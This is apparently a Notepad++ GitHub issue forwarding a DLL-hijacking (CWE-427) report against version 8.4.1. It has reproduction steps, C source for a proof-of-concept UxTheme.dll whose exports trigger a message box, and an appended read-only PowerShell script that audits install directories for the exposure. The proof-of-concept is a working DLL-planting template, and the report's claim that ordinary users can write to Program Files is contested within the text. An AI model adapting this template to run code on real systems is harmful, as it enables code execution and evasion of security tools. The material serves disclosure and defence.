[Security Vulnerability]: Notepad++ is exposed to CWE-427 #12113

@SinghRajenM


@donho, we received an email some time back from Mend Software about a security issue found in Notepad++. You might have overlooked it. Hence, I am creating this Jira and will create a PR too.

I am pasting the content from the email and attachment in this issue for tracking purposes.

=================================================================

Application: Notepad++
Module: Notepad++
Vulnerability: DLL hijacking
Version: 8.4.1 (64bit)

Vulnerability Description:

Notepad++ versions 8.4.1 and before are vulnerable to DLL hijacking where an attacker can replace the vulnerable dll (UxTheme.dll) with his own dll and run arbitrary code in the context of Notepad++. This technique will allow the attacker to evade EDR and AV. The attacker can replace the mentioned dll as the application runs from the “c:\program files\” path, to which regular users have write/edit permissions.

Steps to reproduce:

  1. Compile the attached source code DLL file.
  2. Rename the compiled DLL file to ‘UxTheme.dll’ and copy both ‘notepad++.exe’ and ‘UxTheme.dll’ files to a new folder.
  3. Run ‘notepad++.exe’ and watch the message box.

CVSS 3.1 Vector:

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 3.1 Score:

6.5

CWE List:

CWE-427: Uncontrolled Search Path Element

=================================================================

Source code

#include <windows.h>

// Proof-of-concept payload from the report: shows a message box when called.
int Main() {
    MessageBoxW(0, L"DLL Hijacking", L"Hello", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Stub exports with the UxTheme.dll names that notepad++.exe imports, so the
// loader resolves them from this file; two of them invoke the payload above.
__declspec(dllexport) void OpenThemeData() { Main(); }
__declspec(dllexport) void CloseThemeData() {}
__declspec(dllexport) void DrawThemeBackground() {}
__declspec(dllexport) void GetThemeBackgroundContentRect() {}
__declspec(dllexport) void GetThemePartSize() {}
__declspec(dllexport) void GetThemeFont() {}
__declspec(dllexport) void SetWindowTheme() {}
__declspec(dllexport) void EnableThemeDialogTexture() { Main(); }
__declspec(dllexport) void DrawThemeParentBackground() {}
__declspec(dllexport) void GetThemeTransitionDuration() {}
__declspec(dllexport) void BufferedPaintRenderAnimation() {}
__declspec(dllexport) void EndBufferedAnimation() {}
__declspec(dllexport) void BeginBufferedAnimation() {}
__declspec(dllexport) void BufferedPaintStopAllAnimations() {}
__declspec(dllexport) void DrawThemeTextEx() {}
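The report above rests on two conditions: a system DLL name that the application resolves from its own directory, and a directory that low-privilege users can write to. The following audit script is an added example (not part of the report or of the Notepad++ code base) that checks both on a given install; it assumes the default 64-bit install path and the UxTheme.dll name from the report, both adjustable via parameters.

```powershell
# Added example: audit an install directory for the DLL-planting exposure (CWE-427)
# described in the report. Assumed defaults: $env:ProgramFiles\Notepad++ and the
# UxTheme.dll name from the report. Read-only; changes nothing on the system.
param(
    [string]   $AppDir          = (Join-Path $env:ProgramFiles 'Notepad++'),
    [string[]] $KnownSystemDlls = @('UxTheme.dll')
)

$system32 = [Environment]::GetFolderPath('System')   # e.g. C:\Windows\System32

# 1. DLLs already in the app directory that also exist in System32. The loader
#    searches the application directory before System32, so these copies win over
#    the Windows ones and should carry a valid vendor signature.
$shadowing = Get-ChildItem -Path $AppDir -Filter '*.dll' -File |
    Where-Object { Test-Path -Path (Join-Path $system32 $_.Name) } |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{ Dll = $_.Name; Signature = $sig.Status; Signer = $sig.SignerCertificate.Subject }
    }

# 2. System DLL names the application imports that are NOT shipped in the app
#    directory: a file dropped there under that name would be loaded first.
$plantable = $KnownSystemDlls | Where-Object { -not (Test-Path -Path (Join-Path $AppDir $_)) }

# 3. Verify the report's write-permission premise for this installation: which
#    low-privilege principals hold Write/Modify/FullControl on the directory?
$lowPriv   = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)
$weakAces = (Get-Acl -Path $AppDir).Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $lowPriv -contains $_.IdentityReference.Value -and
    (([int]$_.FileSystemRights) -band $writeMask) -ne 0
}

Write-Output "== $AppDir =="
Write-Output ("Shadowing System32 DLLs : " + $(if ($shadowing) { ($shadowing | Format-Table -AutoSize | Out-String).Trim() } else { 'none' }))
Write-Output ("Plantable (absent) DLLs : " + $(if ($plantable) { $plantable -join ', ' } else { 'none' }))
Write-Output ("Low-priv write ACEs     : " + $(if ($weakAces) { ($weakAces | ForEach-Object { "$($_.IdentityReference) [$($_.FileSystemRights)]" }) -join '; ' } else { 'none' }))
if ($plantable -and $weakAces) {
    Write-Warning 'Writable install directory plus un-shipped system DLL names: planting is feasible here.'
}
```

On a stock installation the third check normally reports no low-privilege write ACEs, which is the condition the report's impact depends on; a non-empty result there, combined with an absent DLL name, is the finding to remediate (tighten the ACL, or have the application load system DLLs from System32 by full path).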
